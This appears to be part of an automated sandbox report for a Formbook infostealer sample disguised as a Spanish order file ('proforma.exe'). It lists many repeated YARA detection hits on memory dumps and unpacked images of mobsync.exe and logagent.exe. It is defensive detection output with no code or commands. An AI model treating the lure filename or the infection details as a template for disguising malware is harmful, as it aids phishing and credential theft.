Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Se adjunta el pedido, proforma.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
